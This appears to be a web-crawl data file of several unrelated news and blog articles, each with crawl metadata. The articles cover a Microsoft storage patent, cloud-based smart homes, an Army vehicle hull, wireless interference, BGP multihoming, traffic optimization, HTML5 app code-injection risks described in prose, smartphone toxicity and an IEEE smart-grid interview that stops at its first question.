Neuromorphic computing will have a role in Lawrence Livermore's national security missions and could change how the lab does science, according to Jim Brase, deputy associate director for data science with Lawrence Livermore. | <urn:uuid:9cd8717c-0625-47a2-94c3-a1f648b70ead> | CC-MAIN-2017-09 | http://www.arnnet.com.au/article/596935/brain-inspired-supercomputer-will-explore-deep-learning-u-nuclear-program/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00643-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.908184 | 365 | 3.21875 | 3 |
Microsoft has been granted a patent for what it calls "Virtually infinite reliable storage" that works across a distributed storage system. This system is basically a logical file system that distributes copies of files across various physical storage resources, creating essentially an infinite amount of storage so long as there are enough storage resources available, while providing the user a single consistent view of his or her data.
This allows the user to access their data from any location or computer. Data is associated with the user for as long as they want. It can be erased after a certain time, or when the user is removed from the system.
Distributed storage is usually just local storage moved to a server. If that drive goes down, there goes your data unless you have a backup from which to restore it. If you need more storage, you have to request it from IT.
Microsoft's patent is for a technology that allows for individual storage to grow automatically as more physical storage is added to the network. It will configure itself and show up as a new drive to the user with no client-side interaction required.
"From the user's point of view, a single seamless storage resource is provided across multiple volumes. The various volumes may be located on separate physical storage devices and may be associated with the same or different computers in a network. Regardless of where data is physically stored and which computer is being used, and even if it is offline from the network, from the user's point of view the aggregate storage is presented simply as a larger C: drive (for example)," Microsoft wrote in its patent filing.
The patent also covers making backup copies of data. The technology would replicate the file system and all file metadata onto secondary storage devices, allowing separate hard drives to act as backup systems. If a drive fails and the object has a replication level greater than one (meaning two or more backups), then the user will never know that the hard drive has failed or might not even be there, because the data exists elsewhere and was seamlessly moved into place.
The patent is entirely PC-centric. It requires a local storage system connected to the network, which in turn is connected to a cloud environment.
It's remarkable how slow the patent process can be. Microsoft submitted this patent for approval in 2005. | <urn:uuid:ed11c11f-395a-49e8-bdff-a5350fb06004> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2220520/microsoft-subnet/microsoft-patents-smart-cloud-storage.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00643-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964369 | 461 | 2.953125 | 3 |
Note: This week and through Jan. 4 we are posting the top 10 posts of 2012. This post is #9 and was originally published March 15, 2012.
Today’s Internet of people is evolving into an “Internet of things,” because soon there will be more than one trillion connected devices. By 2013, 1.2 billion connected consumer electronics devices are expected in the more than 800 million homes with broadband connections.
Imagine a home that is instrumented with sensors and actuators to control and optimize over the Internet your:
- Windows, doors, blinds, light switches
- Environment: heating, air conditioning
- Appliances: clothes washer & dryer, dishwasher
- Utility meters: water, electricity, gas
- Entertainment: TV, BD player, audio system
- Security: surveillance cameras
- Endless list of consumer products of the future
What makes a home smarter, rather than just smart?
IBM has defined three characteristics that distinguish this new generation of household devices: Instrumented, interconnected, and intelligent.
- Instrumented is the ability to sense and monitor changing conditions. Instrumented devices provide increasingly detailed information and control about their own functioning and also provide information about the environment in which they operate. For instance, a clothes washer can report information about the state of its components to support preventive maintenance for avoiding unforeseen outages. At the same time, it can sense its wash load to optimize its operation; it can send usage information to the manufacturer for data driven product innovation and it can be switched on by external signals when the energy cost is lowest.
- Interconnected is the ability to communicate and interact with people, systems, and other objects. Interconnected devices make possible remote access to information about a device and control of the device. This way enables services throughout the Internet, removing complexity from the home and lowering costs for the service providers. At the same time, it supports the aggregation of information and control of devices throughout the network. This means that consumers can get a consistent view of their devices, both from home and from mobile devices. For service providers, it provides an aggregate view of customer characteristics according to criteria such as geographic location, consumption patterns, or types of service.
- Intelligent is the ability to make decisions based on data, leading to better outcomes. Intelligent devices support the optimization of their use, both for the individual consumer and for the service provider. For instance, a utility can send signals to consumers’ homes to manage discretionary energy use in order to reduce peak loads. By coordinating this process throughout an entire service area, the utility can optimize the peak reduction, while saving the consumers money on their bills.
Compared with previous attempts to enable the “smart home,” where the intelligence was based on centralized control through a home server or gateway, the intelligence and with it the complexity in the new smarter home is moved out from the home onto the network, or more precisely the Internet cloud.
This new paradigm creates opportunities for innovative services, which build on the computational power and scalability of the cloud, along with the collective consumer knowledge. Data that is aggregated and then stored within the cloud can provide dramatic new insights about consumer needs and behavior. Ultimately, this paradigm facilitates a host of possibilities, from radically improving the performance of current devices and services, to delivering consumer benefits that have not yet even been considered.
Cloud-based Service Delivery Platform (SDP) is the key in the smarter home
We are aware of the following key advantages of the SDP from the telecommunication world:
- Managing the complexity of service deployments means that third-party service providers can focus on the specific value they add, without having to acquire the skill or expend the capital to build a full-function service infrastructure.
- Using services oriented architecture and Web 2.0 technologies, the SDP enables collaboration for a more agile service creation.
- Common storefront technology enables service providers to integrate their business processes and store fronts for monetizing their services more efficiently.
Implementing the SDP concept in the cloud can revolutionize the ecosystem for the smarter home. Cloud computing technology creates an ideal environment for an intelligent, highly efficient, and highly flexible utility approach to services in the network. At the hardware infrastructure level, cloud computing enables the flexible, dynamic and low-touch provisioning of resources to applications. The creation of virtual service images supports the easy life cycle management and deployment of services. Finally, standardized web services interfaces to the services enable the dynamic composition of individual services into flexible solutions in a plug-and-play mode.
The cloud for managing the consumer services can extend directly into the home. A services “clone” can directly interact with services in the network, in effect becoming part of the cloud. This clone can function as a limited local replica of some services, delivering control even in the case of a network failure. It can also ease the connection of home devices to the network by translating protocols and acting as traffic concentrator. The ability to adapt any type of network and application protocols increases the choice of devices and services for consumers.
Cloud technology, whether in the form of software as a service (SaaS) or infrastructure as a service (IaaS), improves service management by speeding up the time to market and lowering the management cost for service management, resource management and life cycle management. It reduces the resources cost by enabling more efficient allocation of fractional hardware resources to virtual service images. I think most value will come from business process as a service (BPaaS) form of cloud technology; one already finds a number of BPaaS provided by various services providers as independent service provider or as a value-added service to existing consumers.
Examples include surveillance services, medical monitoring services provided by some private clinics to elderly patients living alone at home, or entertainment services provided by TV program broadcasters.
Let’s explore the role of the cloud based entertainment services
In the entertainment industry, the cloud-based services provider model (broadband content services) is already creating major dynamic changes on the content delivery side, where instead of content sale, model is moving from discrete content sale to connected content services model. Alternatively, the interconnected smarter devices are changing the industry from discrete product model to the connected devices model. Today, consumers expect their content on any screen, any device.
Yes, although the cloud and smarter devices help content to be accessible on any screen and device, and be economical, scalable, and secure, the industry standards are equally important. There are new standards such as Hybrid Broadcast Broadband TV (HbbTV), which are trying to create an open and business-neutral technology platform that seamlessly combines TV services delivered by broadcast with services delivered by broadband, and also enables access to Internet-only services for consumers using connected TVs and set-top boxes. The HbbTV specification is based on existing standards and web technologies including Open IPTV Forum (OIPF), CEA, DVB, and W3C. The HbbTV standard provides the features and functionality required to deliver feature-rich broadcast and Internet services.
Yes, the cloud is indeed an enabler for the smarter home as it takes care of the highly fluctuating computing needs; it provides flexible service management, and enables remote access and real-time monitoring of the cloud-based services. To meet the consumer expectations of the smarter home, continued development of industry standards is important; and the good news is, the various industry participants are working hard to develop required standards. I think in next year or two, Internet of things will be a normal way of life because today’s Internet of people and cloud technology will play a key enablement role.
Share this post: | <urn:uuid:dc79ee83-18da-4f57-a107-3a8df04946b8> | CC-MAIN-2017-09 | https://www.ibm.com/blogs/cloud-computing/2012/12/cloud-an-enabler-for-a-smarter-home-no-9/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00643-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927566 | 1,572 | 2.890625 | 3 |
Army to Strengthen Ground Combat Vehicles
The U.S. Army Research Laboratory has collaborated with Alcoa, the world’s third largest producer of aluminum, in order to come up with a way to better protect soldiers from improvised explosive devices (IEDs). The solution that they decided on is a single-piece aluminum hull designed for ground combat vehicles. This hull not only makes ground vehicles more durable, but lighter and cheaper as well.
"For decades, the Army has recognized the survivability benefits of a single-piece hull due to its thickness, size and shape for ground combat vehicles," said Dr. Ernest Chin of the Army Research Laboratory. "Our collaborative effort to develop continuous and seamless aluminum hull technology has the potential to be a game changer for how combat vehicles are designed and made to better protect our soldiers."
The new aluminum hull would improve the performance of combat vehicles in four major ways, the first being improved blast protection.
The combat vehicles are usually manufactured with welded seams but with the new hull those seams would be completely eliminated, thus improving the durability and protection of the vehicle.
The aluminum hull also increases damage resistance. In the event that an enemy attempts to destroy a combat vehicle, the chances that they are successful have been decreased. The Alcoa alloys are more blast-absorbent and will reduce damage taken.
The design of the hull is also more efficient than before with a reduction in weight. This weight reduction brings about the fourth benefit of the aluminum hulls – cost savings. Due to the weight reduction, fuel efficiency will be enhanced, assembly time reduced, and complexity diminished.
“Alcoa has helped the U.S. military stay ahead of emerging threats by innovating durable, lightweight aluminum technologies since World War I,” said Ray Kilmer, Alcoa Executive Vice President and Chief Technology Officer. “Our experts are now developing the world’s largest, high-strength aluminum hull for combat vehicles to better defend against IEDs, the greatest threat our troops face in Afghanistan, while meeting the Army’s affordability needs.”
The program was initiated after Alcoa was able to model significant performance advantages of the new and improved hull. Not only should it provide more protection from IEDs, but other modern-day military threats as well. | <urn:uuid:12ad9be8-36dd-4a31-8de9-84b31371c161> | CC-MAIN-2017-09 | https://www.enterprisetech.com/2013/10/21/army_to_strengthen_ground_combat_vehicles/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00043-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.96076 | 478 | 2.625 | 3 |
Researchers at the University of Michigan have invented a way for different wireless networks crammed into the same space to say "excuse me" to one another.
Wi-Fi shares a frequency band with the popular Bluetooth and ZigBee systems, and all are often found in the same places together. But it's hard to prevent interference among the three technologies because they can't signal each other to coordinate the use of the spectrum. In addition, different generations of Wi-Fi sometimes fail to exchange coordination signals because they use wider or narrower radio bands. Both problems can slow down networks and break connections.
Michigan computer science professor Kang Shin and graduate student Xinyu Zhang, now an assistant professor at the University of Wisconsin, set out to tackle this problem in 2011. Last July, they invented GapSense, software that lets Wi-Fi, Bluetooth and ZigBee all send special energy pulses that can be used as traffic-control messages. GapSense is ready to implement in devices and access points if a standards body or a critical mass of vendors gets behind it, Shin said.
Wi-Fi LANs are a data lifeline for phones, tablets and PCs in countless homes, offices and public places. Bluetooth is a slower but less power-hungry protocol typically used in place of cords to connect peripherals, and ZigBee is an even lower powered system found in devices for home automation, health care and other purposes.
Each of the three wireless protocols has a mechanism for devices to coordinate the use of airtime, but they all are different from one another, Shin said.
"They can't really speak the same language and understand each other at all," Shin said.
Each also uses CSMA (carrier sense multiple access), a mechanism that instructs radios to hold off on transmissions if the airwaves are being used, but that system doesn't always prevent interference, he said.
The main problem is Wi-Fi stepping on the toes of Bluetooth and ZigBee. Sometimes this happens just because it acts faster than other networks. For example, a Wi-Fi device using CSMA may not sense any danger of a collision with another transmission even though a nearby ZigBee device is about to start transmitting. That's because ZigBee takes 16 times as long as Wi-Fi to emerge from idle mode and get the packets moving, Shin said.
Changing ZigBee's performance to help it keep up with its Wi-Fi neighbors would defeat the purpose of ZigBee, which is to transmit and receive small amounts of data with very low power consumption and long battery life, Shin said.
Wi-Fi devices can even fail to communicate among themselves on dividing up resources. Successive generations of the Wi-Fi standard have allowed for larger chunks of spectrum in order to achieve higher speeds. As a result, if an 802.11b device using just 10MHz of bandwidth tries to tell the rest of a Wi-Fi network that it has packets to send, an 802.11n device that's using 40MHz may not get that signal, Shin said. The 802.11b device then becomes a "hidden terminal," Shin said. As a result, packets from the two devices may collide.
To get all these different devices to coordinate their use of spectrum, Shin and Zhang devised a totally new communication method. GapSense uses a series of energy pulses separated by gaps. The length of the gaps between pulses can be used to distinguish different types of messages, such as instructions to back off on transmissions until the coast is clear. The signals can be sent at the start of a communication or between packets.
GapSense might noticeably improve the experience of using Wi-Fi, Bluetooth and ZigBee. Network collisions can slow down networks and even cause broken connections or dropped calls. When Shin and Zhang tested wireless networks in a simulated office environment with moderate Wi-Fi traffic, they found a 45 percent rate of collisions between ZigBee and Wi-Fi. Using GapSense slashed that collision rate to 8 percent. Their tests of the "hidden terminal" problem showed a 40 percent collision rate, and GapSense reduced that nearly to zero, according to a press release.
One other possible use of GapSense is to let Wi-Fi devices stay alert with less power drain. The way Wi-Fi works now, idle receivers typically have to listen to an access point to be prepared for incoming traffic. With GapSense, the access point can send a series of repeated pulses and gaps that a receiver can recognize while running at a very low clock rate, Shin said. Without fully emerging from idle, the receiver can determine from the repeated messages that the access point is trying to send it data. This feature could reduce energy consumption of a Wi-Fi device by 44 percent, according to Shin.
Implementing GapSense would involve updating the firmware and device drivers of both devices and Wi-Fi access points. Most manufacturers would not do this for devices already in the field, so the technology will probably have to wait for hardware products to be refreshed, according to Shin.
A patent on the technology is pending. The ideal way to proliferate the technology would be through a formal standard, but even without that, it could become widely embraced if two or more major vendors license it, Shin said. | <urn:uuid:206dd27c-d187-42cc-b302-1906a2f36c19> | CC-MAIN-2017-09 | http://www.computerworld.com.au/article/460094/wireless_networks_may_learn_live_together_by_using_energy_pulses/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00639-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.942034 | 1,065 | 3.21875 | 3 |
BGP multi-homing has become as necessary to the networks connected to Internet, as the use of redundant power sources or multiple data centers. No business can afford prolonged outages, and the first and surprisingly most effective way to maximize uptime is through a robust BGP implementation to multiple transit providers. BGP utilizes a set of Autonomous System numbers (ASN) that are assigned to individual networks or relatively large network segments. An “AS Hop” is defined as a transition from one AS to another. The assumption made by BGP is that for any given path, the route with the least number of AS hops is preferable. In addition to this dynamic information, BGP allows administrators to define static path preferences using weights, local preferences, MEDs, etc.
BGP routing information, is largely based on AS hops, and manually configured static preferences. BGP has no capability to discover any other performance characteristics . As a result, metrics such as packet loss, latency, throughput, link capacity and congestion, historical reliability, and other business characteristics are not addressed by this protocol. BGP has no ability to actively discover any of these characteristics, and thus it has no ability to make routing decisions based on them. The routers relying on BGP cannot make dynamic performance-optimized decisions.
Settlement-free peering and best-effort traffic delivery are vital for the efficiency and relatively low cost of operating and connecting to the Internet. The best-effort hovewer has its flaws – congestion. Congestion occurs because of some transit providers port oversubscription, ddos attacks, daily peaks and even congested public traffic exchanges. Other problems can be caused by BGP’s inherent sense of trust between peering partners. This implied trust means that all route updates are considered valid and are treated as such. Hovewer, due to convergence delay, misconfiguration, external protocol interaction and lots of other reasons, not all updates are valid. Invalid updates in the worst cases can lead to routing loops or blackouts. Blackouts happen during an outage in a transit provider network, while the upstream provider still announces the routes to their customers, making them send the traffic in a blackhole. If the blackout is total, the network engineers will notice this and shutdown the BGP session. A partial routing blackout is hard to diagnose and troubleshoot, because of the routing asymmetry in Internet.
Since BGP is focused on reachability and its own stability, in case some problems occur the traffic may only be rerouted due to hard failures. Hard failures are total losses of reachability as opposed to degradation. This means that even though service may be so degraded that it is unusable for an end user, BGP will continue to assume that a degraded route is valid until and unless the route is invalidated by a total lack of reachability. BGP as a dynamic routing protocol is, unfortunately, reactive, only in cases of total failure.
Multi-homing avoids downtime by providing redundancy, however it does not address performance and congestion-related problems that occur in the “middle-mile”, linking backbone networks. Therefore, simple BGP multihoming is not enough. | <urn:uuid:a4994799-1209-480e-a12c-d52fe3243408> | CC-MAIN-2017-09 | https://www.noction.com/blog/bgp-multi-homing-enough-for-network-performance | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00163-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.946069 | 654 | 2.578125 | 3 |
With increased electronic minituriztion and the density of the chips running such devices heat is a mortal enemy for the power and scalability of such systems.
DARPA today announced a program called Intrachip/Interchip Enhanced Cooling (ICECool) that it hopes will go the heart of such heat problems by building chips with a drastically different way of cooling that uses what the agency calls a microfluid channel inside the chip or component that will more effectively dissipate heat than current cooling technologies.
In the news: The fantastic world of steampunk technology
"Think of current electronics thermal management methods as the cooling system in your car," said Avram Bar-Cohen, DARPA program manager in a statement. "Water is pumped directly through the engine block and carries the absorbed heat through hoses back to the radiator to be cooled. By analogy, ICECool seeks technologies that would put the cooling fluid directly into the electronic 'engine'. In DARPA's case this embedded cooling comes in the form of microchannels designed and built directly into chips, substrates and/or packages as well as research into the thermal and fluid flow characteristics of such systems at both small and large scales."
At its core, ICECool will explore disruptive thermal technologies that will mitigate thermal limitations on the operation of military electronic systems, while significantly reducing size, weight, and power consumption, DARPA stated. These thermal limitations will be alleviated by integrating thermal management techniques into the chip layout, substrate structure, and/or package design, which will significantly shrink the dimensions of the cooling system and provide superior cooling performance. Successful completion of this program will close the gap between chip-level heat generation density and system-level heat removal density in high-performance electronic systems, such as computers, wireless electronics and solid-state lasers.
DARPA says the need for such technology comes from the increased density of electronic components and subsystems, including the nascent commercialization of 3D chip stack technology, has pushed package-level volumetric heat generation "beyond 1 kW/cm3." Despite the application of aggressive thermal management techniques at the cabinet, module, and board levels, reliance on heat spreading to external heat rejection surfaces, through convoluted and multi-layered junction-to-ambient heat transfer paths, has led to a growing gap between the typical volumetric heat rejection capability of defense electronic systems and chip-level heat generation. The specific goal of ICECool Fundamentals is to demonstrate chip-level heat removal in excess of 1 kW/cm2 heat flux and 1 kW/cm3 heat density.
The ICECool pogrom is follow-on to another DARPA initiative known as the Thermal Management Technologies initiative that look to develop all manner of advanced heat management technologies. For example, its Thermal Ground Plane program is looking to develop high-performance spreaders to replace the copper alloy heat spreaders in conventional systems. The Microtechnologies for Air Cooled Exchangers (MACE) program develops enhanced heatsinks with improvements that reduce the thermal resistance and also reduce the power requirements for the fan in air-cooled systems. And the Active Cooling Module (ACM) program develops miniature, active, high-efficiency refrigeration systems, based on thermoelectric or vapor-compression technologies.
Layer 8 Extra
Check out these other hot stories: | <urn:uuid:4b8aac72-9c0c-439a-b2f2-259785407e35> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2222548/security/darpa-wants-electronics-with-radically-novel-liquid-cooling-technology.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00511-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.910016 | 689 | 3.078125 | 3 |
Intelligent broadband networks and fair share for subscribers
The challenges facing today's broadband network are a result of technical and business decisions made early in the evolution of public data networks. There is a constant contention between users and operators, applications and networks, as well as regulation and flexibility.
Today's broadband service providers are exploiting the latest application and user-aware, policy-based network management systems to ensure that every user receives their fair share of bandwidth.
In the beginning
Since the dawn of the information age, voice — and later data — has been delivered over shared networks. The public switched telephone network (PSTN) was built with more access points (phones) than actual switching capacity. Operators designed their networks based on realistic peak usage and invented mathematics (e.g., Erlang distribution) to help them model for peak times.
The PSTN was managed with call admission control - a call was not admitted to the network unless end-to-end capacity existed to handle it. This was a perfectly acceptable management model for voice circuit-switched calls, but it would not hold up in a modern network with today's voice and data demands.
Data access emerged
Data access brought a new complexity to the network. Access to data or network resources was no longer determined by slow, human-driven needs such as making a phone call. The destinations for voice and data grew exponentially, and so did the number of paths.
Managing this data network became even more complex when applications converged onto one network. Networks experienced the stress of the triple-play, converged voice, data and video being delivered over one pipe to a vast number of destinations.
The emergence of new applications, each with unique quality and timeliness guarantees, added another dimension and complexity to the network. An admission control model was no longer sufficient. The end-to-end network changed dynamically with mobile IP and other applications competing for the same limited bandwidth.
Traffic management was born
In the earliest days of consumer data access, traffic optimization was given little priority. Congestion was straightforward and limited to number of ports and switching capability on the PSTN.
As dial-up access matured, subscribers used prioritized PSTN lines for their modems. This caused conflict in dial-up access equipment and phone switches. Content started to move from proprietary forums to the Web, and broadband emerged as a new means to increase capacity and lower cost for providers.
The introduction of cable and DSL broadband access meant that Internet access grew more mainstream and users developed an always-on behavior. As a largely client-server paradigm, users consumed content that was generated by grassroots publishing. The term user-generated content did not yet exist, and at the time was limited to e-mail.
Soon enough, tech-savvy users with fast computer hardware discovered how to make digital copies of music and learned to 'rip' music from compact discs. Then music sharing grew to meet the digital age with new peer-to-peer (P2P) technology that powered free music sharing sites like Napster. As Napster and other file-sharing networks such as Gnutella, Kazaa and WinMX emerged and grew in popularity, bandwidth rates per subscriber soared.
Broadband service providers added access capacity as fast as possible to meet subscriber growth and implemented access limits on the TCP port numbers used by these bandwidth-intensive applications.
Millions of new subscribers around the world connected to the Internet. Drawn by popular applications such as P2P file sharing, voice-over-IP (VoIP) services like Skype, online gaming and digital media such as YouTube, bandwidth consumption absolutely soared.
With a growing number of applications, each with its own unique characteristics and delivery demands competing for available bandwidth, packets were easily dropped and quality of service (QoS) suffered. As a result, a very small number of users could cause quality problems for a wide range of popular applications.
With quality of service being threatened, service providers invested in intelligent network tools to get a better understanding of subscriber and application traffic on their networks. Network intelligence was the first step in balancing the competing network demands and establishing reasonable network management practices.
Models of traffic optimization
As broadband adoption continued to grow worldwide, service providers started to leverage their policy-management infrastructure to improve operational efficiencies in areas such as network security. Traffic optimization remained relatively static as long as the service provider left sufficient capacity for consumers to access the content they wanted.
However, the rise of mobile data also meant increasingly expensive and scarce access resources were being shared by unknown and varying numbers of users. In response, service providers added user-based management technologies to ensure fairness and provide a consistent quality of experience (QoE) for all users.
MODELS CURRENTLY IN USE
Application-based traffic optimization uses the properties of each network protocol to provide the minimum bandwidth that guarantees acceptable quality. Bulk file transfer applications are given the lowest priority since they are typically non-interactive and long-lived. For example, a one-way bulk non-interactive application, such as a file download, is lowest priority, while one-way streaming media, such as YouTube, may be next in priority, and an interactive application such as VoIP has the highest priority. As the network becomes heavily congested, this prioritization becomes important as each application is degraded, if not prioritized. Application-based optimization delivers excellent overall quality and subscriber satisfaction.
User-based traffic optimization is measured over relatively short time periods. This model gives the service provider a strong tool to ensure consistent quality on an individual subscriber basis. However, a strictly user-based model can be unfair to the heaviest users, as their traffic is indiscriminately treated regardless of the application they are using. A better solution would be to combine application and user-based models, allowing users to maintain their overall bandwidth behavior and control which applications are affected during periods of congestion.
Application- and user-based:
In this method, access to bandwidth is given to both the service provider and the end-user. The provider enforces user-to-user fairness allocation, and the end-user controls how their individual traffic operates within that allocation. For example, a user may wish to prioritize their VPN access higher than their HTTP, while another user may choose online gaming as their top priority. During periods of network congestion, the application- and user-based model ensures one end-user's prioritized application does not overly impact another's.
This traffic optimization model would increase subscriber satisfaction by offering personalized service, allowing end-users more control over their own priorities. This model may involve a 'quota' of QoS points or be presented as a Web page, which gives specific weightings per application or per application class. There would be no change in billing plans to operate this service, which makes it very feasible with today's technology and consumer education level. This model is optimal because it provides a network-neutral and consumer-transparent sharing of bandwidth.
BACK TO THE FUTURE
Internet traffic optimization has come a long way from the early days of dial-up access, both in terms of demand and complexity. End-user controls provide an enforced inter-user fairness that gives subscribers the ability to prioritize their applications as they see fit - effectively removing any bias that the service provider may impose upon applications.
Once traffic optimization reaches the stage where both the needs of the end-user and the needs of the operator are effectively balanced, traffic optimization will evolve once again. The new model may resemble an economic free market form that ensures fairness through the alignment of every party's interests. Transparency will be the overriding factor in determining the best possible network solution in all circumstances where quality of experience is concerned.
Email Don Bowman at: email@example.com | <urn:uuid:2bb8ab6b-2439-448c-99a0-908611641c3e> | CC-MAIN-2017-09 | https://www.cedmagazine.com/article/2009/01/evolution-traffic-optimization | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00211-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.946282 | 1,589 | 2.53125 | 3 |
The battle between Apple's iPhone 5 and Samsung's Galaxy S III rages on -- a study conducted by the disassembly firm iFixit and nonprofit organization Ecology Center has concluded that the iPhone 5 is less toxic than the Galaxy S III smartphone.
The study, which sought out the levels of hazardous chemical contents in smartphones, placed the iPhone 5 at the fifth spot with a 2.8 score out of an overall rating of 5, and the Galaxy S III in the ninth spot with a rating of 3.0. Both phones were topped by Motorola's Citrus, which took the top spot, followed by LG's Remarq, the iPhone 4S and Samsung Captivate.
The study's goal was to identify the environmental friendliness of smartphones, and to check the levels of hazardous substances that could be potentially damaging to the environment and human health. IFixit and Ecology Center disassembled 36 mobile phones released in the last 5 years, and tested for 35 substances including chlorine, mercury, lead, arsenic, chromium, cobalt, copper, nickel and cadmium. Tests were conducted on cases, processors, buttons, circuit boards, screens and other hardware. Results of the study are available on Ecology Center's HealthyStuff.org website.
The new iPhone 5 is a big improvement over the original iPhone, which was released in 2007 and has been rated the most toxic in the study. Also among the most toxic phones are the Nokia N95, which also shipped in 2007, and Research In Motion's BlackBerry Storm 9530, which shipped in 2008.
Every phone contained at least lead, bromine, chlorine, mercury and cadmium, according to the study. The Samsung Galaxy S III and iPhone 5 had some levels of lead and mercury contents.
The study was based on 1,100 samples of smartphones, with three for each brand, said Jeff Gearhart, research director at Ecology Center.
The goal was to point out the environmental friendliness of the smartphones, Gearhart said. The effects of hazardous materials could linger for years, and a wide range of contaminants could show up in air or soil years after smartphones are discarded.
It is critically important that smartphones are properly recycled to limit the effects of hazardous materials, Gearhart said. Smartphones tend to be chemically intensive, but the mobile industry is making great progress in reducing hazardous chemicals.
Part of the improvement in the smartphones comes through removal of hazardous substances. More smartphones are using cables free of polyvinyl chloride (PVC), mercury-free LCD displays and arsenic-free glass. Environmental organizations like Greenpeace regularly carry out tests to check computers for PVC plastic and brominated flame retardants (BFRs). PC makers like Apple, Hewlett-Packard and Dell have been reducing the use of PVC plastic and BFRs in computers in an effort to go green.
Electronics companies are producing cleaner smartphones, but the use of toxic chemicals needs to be discouraged through better regulation, Gearhart said. In 2003, the European Union adopted the ROHS (Restriction of Hazardous Substances Directive), which restricts hazardous substance use in electronics. Efforts are also underway in the U.S. to restrict the use of toxic chemicals in electronics.
There are also ongoing concerns around consumers dumping toxic electronics in waste, which could eventually hurt the environment. Some nonprofit organizations such as Basel Action Network are encouraging recycling and chasing down organizations that send electronics to developing countries, where the products are burned instead of recycled.
A study by the U.N. in 2010 revealed that the e-waste generated by PCs, consumer electronics and appliances would grow by 2020. Discarded mobile phone e-waste in 2020 will be about 18 times higher in India than the 2007 levels and seven times higher in China.
But electronics companies are offering instructions on how products can be recycled for free. Wireless carrier T-Mobile includes return labels in some smartphones so the products can be sent free of cost to recycling centers. | <urn:uuid:f82d6ebb-aa42-460f-8819-f9788dec9249> | CC-MAIN-2017-09 | http://www.itworld.com/article/2721963/data-center/apple-iphone-5-less-toxic-than-samsung-galaxy-s-iii.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171933.81/warc/CC-MAIN-20170219104611-00387-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943363 | 809 | 2.546875 | 3 |
University researchers have found that HTML5-based mobile apps, which are expected to become more prevalent over the next several years, could add security risks for businesses.
Through developer error, the Web technology could automatically execute malicious code sent by an attacker via Wi-Fi, Bluetooth or a text message, researchers at Syracuse University reported last month at the Mobile Security Technologies Conference in San Jose, Calif.
"The malicious code can surreptitiously capture the victim’s sensitive information off their mobile device and ex-filtrate it to an attacker," Jack Walsh, a mobile security expert at ICSA Labs, said Monday in a blog post on the research. "Second, and potentially worse, the app may spread its malicious payload like a worm -- SMS text messaging itself to all of the user’s contacts."
Security weaknesses introduced in HTML5-based apps could become a bigger problem as their use grows. Because of the cross-platform nature of the Web technology, it is expected to be in more than half of all mobile apps by 2016, according to Gartner.
If the developers just want to process data, but use the wrong APIs, the code in the mixture can be automatically executed, the researchers said.
"If such a data-and-code mixture comes from an untrustworthy place, malicious code can be injected and executed inside the app," the researchers said.
The risk of developer error is not unique to HTML5 apps.
"An HTML5-based app is no different from a web-based application and the same security measures should apply to both," Bogdan Botezatu, senior e-threat analyst for Bitdefender, said.
Ways in which an attacker could send a malicious code-data string to an HTML5 app include an SSID field sent over a Wi-Fi access point, a QR code, JPEG image or as metadata within an MP3 music file. The SSID, or service set identifier, is used in connecting devices to a network.
Other places malicious code could be hidden are in an SMS message displayed by the app. The code could also be sent from an infected device via Bluetooth if the app attempts a pairing.
In order for HTML5-based apps to be cross-platform, they require a middleware framework that lets them connect to the underlying system resources, such as files, device sensors and the camera.
Google Android, Apple iOS and Windows Phone have different containers that apps use for accessing services, so developers let the framework creators handle the plumbing underneath the Web app.
Examples of frameworks include PhoneGap, RhoMobile and Appcelerator. The researchers studied 186 PhoneGap plugins and found 11 that were vulnerable to the code-injection attack.
While the researchers only used PhoneGap and Android for their work, the same problems were applicable across operating systems.
"Since apps are portable across platforms, so are their vulnerabilities," the researchers said. "Therefore, our attacks also work on other platforms."
This story, "Why businesses should use caution with HTML5-based mobile apps " was originally published by CSO. | <urn:uuid:29eb6962-c249-44bc-b5f4-cec159d3cd4d> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2364306/data-protection/why-businesses-should-use-caution-with-html5-based-mobile-apps.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171933.81/warc/CC-MAIN-20170219104611-00387-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.934947 | 641 | 2.828125 | 3 |
At a very young age, Massoud Amin, director of the Technological Leadership Institute, realized that electricity was vital to modern society. Growing up and traveling in Iran in the 1960s, he saw how access to electricity transformed society — from farming, schools, businesses and medical facilities. As a teen visiting New York City, lightning caused a 24-hour blackout, during which Amin observed that the world depends on reliable electricity to support economies and quality of life. The experience reinforced his passion for electrical infrastructure, and he’s been committed since then to helping improve the grid.
Amin, pictured at left, is a senior member of IEEE, Institute of Electrical and Electronics Engineers, a professional organization dedicated to technology innovation, and chairman of the IEEE Smart Grid Newsletter.
In a recent interview with Government Technology, Amin talks about IEEE ( pronounced I-triple-E) and the smart grid — its complexities, governance and broadband implications.
1. What is IEEE, in a nutshell?
